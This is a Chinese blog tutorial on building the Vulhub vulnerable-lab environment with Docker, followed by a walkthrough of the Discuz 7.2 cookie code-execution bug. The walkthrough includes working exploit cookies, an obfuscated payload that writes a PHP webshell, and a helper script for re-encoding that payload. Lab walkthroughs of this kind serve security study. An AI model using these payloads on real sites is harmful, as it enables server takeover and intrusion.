Vulhub漏洞靶场搭建(超详细),零基础入门到精通,看这一篇就够了!

简介

Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。

  • 物理机:Windows 10
  • 虚拟机:Centos 7 192.168.1.13,网卡设置为NAT模式
环境安装
安装Docker
$ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun



安装Docker-Compose

下面提供2种安装方式,2选1即可

  • 离线安装。先到Docker-Compose下载最新版本的docker-compose-Linux-x86_64,并上传到虚拟机
# 然后将其移动到/usr/local/bin目录并改名为docker-compose
$ mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose

# 添加执行权限
$ sudo chmod +x /usr/local/bin/docker-compose

# 验证
$ docker-compose version



  • Pip安装
# 安装docker-compose
$ pip install docker-compose

# 如果没有pip需要先安装
$ yum -y install epel-release
$ yum -y install python-pip
$ pip --version  # 查看pip版本

# 可能会遇到一个ReadTimeoutError的错误,需要修改pip源,请看文末问题汇总



安装Vulhub

同上,两种方法2选1

  • 离线安装。下载Vulhub压缩包,并上传到虚拟机任意目录,这里放在/root/目录
# 创建一个vulhub目录并将压缩包放进去
$ mkdir vulhub && mv master.zip vulhub/ && cd vulhub/
# 解压
$ unzip master.zip



  • Git安装
$ git clone https://github.com/vulhub/vulhub.git

# 如果没有Git需要先安装
$ yum install -y git



Docker加速

可选。配置阿里云镜像加速

  • 这里的加速器地址可以在阿里云容器加速服务中的镜像加速器获取
$ sudo mkdir -p /etc/docker
$ vim /etc/docker/daemon.json
# 加入以下代码
{
  "registry-mirrors": ["加速器地址"]
}

$ sudo systemctl daemon-reload
$ sudo systemctl restart docker



靶场使用
  • 选择漏洞环境,在Vulhub中选择某个环境,cd进入对应目录
$ cd vulhub/discuz/wooyun-2010-080723/



  • 可选。可以通过vi编辑其中的docker-compose.yml,修改端口和账号密码
$ vi docker-compose.yml



  • 启动环境:
$ docker-compose up -d   # 启动环境 
$ docker-compose down    # 关闭环境,需要在该环境目录下执行



  • 可选。编译环境。启动环境后,会自动查找当前目录下的配置文件。
    • 如果配置文件中包含的环境均已经存在,则不会再次编译,反之则会自动进行编译。所以,其实docker-compose up -d命令是包含了docker-compose build的。
    • 但是如果更新了配置文件,则需要手工来重新编译靶场环境。
$ docker-compose build



物理机访问容器

经过上面的配置,已经可以在虚拟机Centos7中使用浏览器访问对应的漏洞环境。但此时物理机是无法通过浏览器访问漏洞环境的,需要手动配置静态路由,将通往Docker的数据包交给虚拟机192.168.1.13来转发

  • 先查看一下Docker容器的IP
$ docker ps  # 查看运行服务端口
CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS              PORTS                  NAMES
a4eed382479c        vulhub/discuz:7.2   "docker-php-entrypoi…"   About a minute ago   Up About a minute   0.0.0.0:8080->80/tcp   wooyun-2010-080723_discuz_1
15b46d6919a9        mysql:5.5           "docker-entrypoint.s…"   About a minute ago   Up About a minute   3306/tcp               wooyun-2010-080723_db_1

$ docker inspect [容器ID] | grep IPAddress  # [容器ID]为漏洞环境所在容器,此处为a4eed382479c
# "IPAddress": "172.18.0.3"



  • 先关闭虚拟机防火墙
$ systemctl stop firewalld.service



  • 物理机使用管理员模式打开CMD
$ route add -p 172.18.0.0 mask 255.255.0.0 192.168.1.13 # -p 永久路由,重启系统路由仍有效
$ route print  # 打印当前路由表
================================================================
永久路由:
  网络地址          网络掩码          网关地址        跃点数
  172.18.0.0      255.255.0.0     192.168.1.13       1
================================================================



启动环境
  • 选择漏洞环境。首先在Vulhub中选择靶场环境,cd进入对应目录
$ cd vulhub/discuz/wooyun-2010-080723/



  • 修改端口和账号密码(可选)。可以通过vi编辑其中的docker-compose.yml来进行修改
$ vi docker-compose.yml



  • 启动环境
$ docker-compose up -d   # 启动环境 
# Starting wooyun-2010-080723_db_1 ... done
# Starting wooyun-2010-080723_discuz_1 ... done



  • 查看靶机运行端口
# 主要看容器ID和端口,然后通过容器ID查看IP
$ docker ps  # 查看运行服务端口
================================================
CONTAINER ID        IMAGE               PORTS
a4eed382479c        vulhub/discuz:7.2   0.0.0.0:8080->80/tcp 
================================================

$ docker inspect [容器ID] | grep IPAddress  # [容器ID]为漏洞环境所在容器,此处为a4eed382479c
# "IPAddress": "172.18.0.3"



复现步骤
  • 浏览器访问http://[IP]:[Port]/install/,安装数据库。数据库服务器填写db,数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页
  • 登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子
  • 将Cookie修改为下面,点击放包
# EXP
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

  =====================================================================================
# 此时完整的报文如下:
GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 172.18.0.3
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://172.18.0.3/forumdisplay.php?fid=2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
Connection: close
=====================================================================================



复制

  • 此时可以看到phpinfo()被执行

img

前台GetShell
  • 同样方法传入以下Cookie写入一句话木马文件,文件为x.php,密码为pwd
# EXP
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))



img

  • 访问http://[IP]:[Port]/x.php,POST数据测试成功,且使用蚁剑连接也成功

img

其它
  • 复现完之后可以通过以下命令关闭环境,但注意此命令需要在对应环境目录下执行
$ docker-compose down
# Stopping wooyun-2010-080723_discuz_1 ... done
# Stopping wooyun-2010-080723_db_1     ... done
# Removing wooyun-2010-080723_discuz_1 ... done
# Removing network wooyun-2010-080723_default



  • 检查是否关闭
$  docker ps



  • 附一个复现时写的ASCII码和字符互相转换的小脚本,方便修改POC的文件名和密码
import re
# ASCII = ord(Word)
# Word = chr(ASCII)

# ASCII -> Word
def ASCII2word(ASCIIs):
    for c in re.findall(r"(\d+)", ASCIIs):
        print(chr(int(c)),end="")

# Word -> ASCII
def word2ASCII(words):
    ASCIIs = ""
    for word in words:
        ASCIIs += "Chr(" + str(ord(word)) + ")."
    print(ASCIIs)

asciis = "Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(109).Chr(105).Chr(115).Chr(104).Chr(105).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(116).Chr(101).Chr(115).Chr(116).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)"
ASCII2word(asciis)

words = "fputs(fopen('x.php','w'),'<?php @eval($_POST[pwd])?>');"
word2ASCII(words)



问题汇总
  • 下载Docker时候出现错误curl: (6) Could not resolve host: get.docker.com; Unknown error
# 原因: DNS出现问题,修改DNS即可
$ vim /etc/resolv.conf   # 修改DNS

# Generated by NetworkManager
nameserver 223.5.5.5  # AliDNS



  • 出现问题:ERROR: Couldn't connect to Docker daemon at http+docker://localhost - is it running
$ service docker status  # 查看Docker状态
$ service docker start   # 启动Docker



  • 删除全部镜像
# 如果想删除某个漏洞环境所有内容(包括镜像、容器、磁盘卷、网络),可以执行
$ docker-compose down --rmi all -v



  • 删除永久路由
$ route delete 172.18.0.0    # 删除路由



  • Docker未启动
$  service docker status    # 查看状态
#  Active: inactive (dead)  # 出现此条即未启动
$  service docker start



  • Pip安装时出现ReadTimeoutError错误
$ mkdir ~/,pip/
$ cd ~/,pip/
$ vim pip.conf 
# 添加以下代码
[global]
index-url=https://mirrors.aliyun.com/pypi/simple/
$ pip install --upgrade pip  # 更新pip


  网络安全学习资源分享:
-----------------------------------------------------------------------------------------------------

**给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!**

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要<mark>全套《**网络安全入门+进阶学习资源包**》</mark>,需要<mark>点击下方链接</mark>即可前往获取

<code>**读者福利 |** </code> **[优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 ](https://mp.weixin.qq.com/s/2ub6VUZ9hQp8VS8o1BWkqw)**  <code>**(安全链接,放心点击)**

<img src="https://img-blog.csdnimg.cn/img_convert/968eb8cf7131d9022410c04079f21a25.png" style="margin: auto" />



### 👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要**先学习成长路线图,方向不对,努力白费。**

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/73381587b71a4fcca460e6f3249da272.webp)
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/c6e4885811d84247a93d6bcf240fd2c0.webp)


### 👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢**晦涩的文字**,我也为大家准备了视频教程,其中一共有**21个章节**,每个章节都是**当前板块的精华浓缩。**<font color="red">**(全套教程文末领取哈)**
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/356c31e97b9448ac9a030276befeb8ce.webp)

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/f86928c4051649c380cab368ad9f54df.webp)


### 👉3.SRC&黑客文档👈

大家最喜欢也是最关心的**SRC技术文籍&黑客技术**也有收录

**SRC技术文籍:**

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/24339152d1874ccfb395f44bdecc2d83.webp)

**黑客资料由于是敏感资源,这里不能直接展示哦!**<font color="red">**(全套教程文末领取哈)**
### 👉4.护网行动资料👈
其中关于**HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!**

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/9124e6befe844cf39ade6c832e5cea63.webp)

### 👉5.黑客必读书单👈



![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/c8c8c5c516344f2d8177b503d2433c94.webp)

### 👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始**思考找工作**的事情了,而工作绕不开的就是**真题和面试题。**
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/0c951f8196954fff816621fdb7557dd8.webp)
**所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~**


<code>**读者福利 |** </code> **[优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 ](https://mp.weixin.qq.com/s/2ub6VUZ9hQp8VS8o1BWkqw)**  <code>**(安全链接,放心点击)**



<img src="https://img-blog.csdnimg.cn/img_convert/968eb8cf7131d9022410c04079f21a25.png" style="margin: auto" />
### 如何在 Kali 系统上搭建 Vulhub 漏洞靶场 #### 一、Vulhub 靶场简介 Vulhub 是一个基于 Docker 和 Docker Compose 的漏洞靶场环境集合,旨在帮助开发者和安全研究人员学习并测试各种已知的安全漏洞。通过这些预构建的漏洞环境,可以更好地理解和掌握常见漏洞的工作原理及其修复方法[^1]。 --- #### 二、前置条件 为了成功搭建 Vulhub 漏洞靶场,在开始之前需要确认以下依赖项已经安装完成: - **Docker**:用于运行容器化应用的核心工具。 - **Docker Compose**:负责管理多容器的应用场景配置文件(`docker-compose.yml`)。 可以通过以下命令验证是否已正确安装上述组件: ```bash docker --version && docker-compose --version ``` 如果未安装,则需先按照官方文档说明完成安装过程[^4]。 --- #### 三、具体操作流程 ##### 1. 安装 Git 工具 由于后续会克隆 Vulhub 项目仓库至本地机器,因此需要确保系统中存在 `git` 命令支持。执行如下指令来检查或者安装 git 软件包: ```bash apt update && apt install -y git ``` ##### 2. 下载 Vulhub 项目源码 利用 git 将远程 GitHub 上托管的 Vulhub 库复制下来,并指定存储目录位置以便于管理和访问: ```bash git clone https://github.com/vulhub/vulhub.git /opt/vulhub/ ``` 此步完成后即可获得完整的漏洞模拟环境资源列表[^2]。 ##### 3. 测试特定漏洞实例——以 Apache HTTP Server 后缀解析缺陷为例 假设目标是重现某个具体的 Web 服务器相关问题 (如 CVE 编号描述),那么可以直接定位到对应子目录下再发起服务初始化请求: ```bash cd /opt/vulhub/httpd/apache_parsing_vulnerability/ docker-compose up -d ``` 这里采用了后台模式启动所有必要的进程单元 (-d 参数作用)[^3]。 此时应该能观察到一个新的虚拟网络连同关联的服务节点被创建出来供进一步探索分析之用。 --- #### 四、注意事项 - 如果中途遇到权限不足错误提示,请尝试给定适当授权范围;比如赋予当前用户加入 docker 组成员身份从而免除每次调用都附加 sudo 关键字前缀的情况发生。 - 当不再需要某套实验数据集时记得及时清理释放占用空间以免影响主机性能表现: ```bash docker-compose down ``` 以上即为整个部署环节概述以及部分典型应用场景示范介绍。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值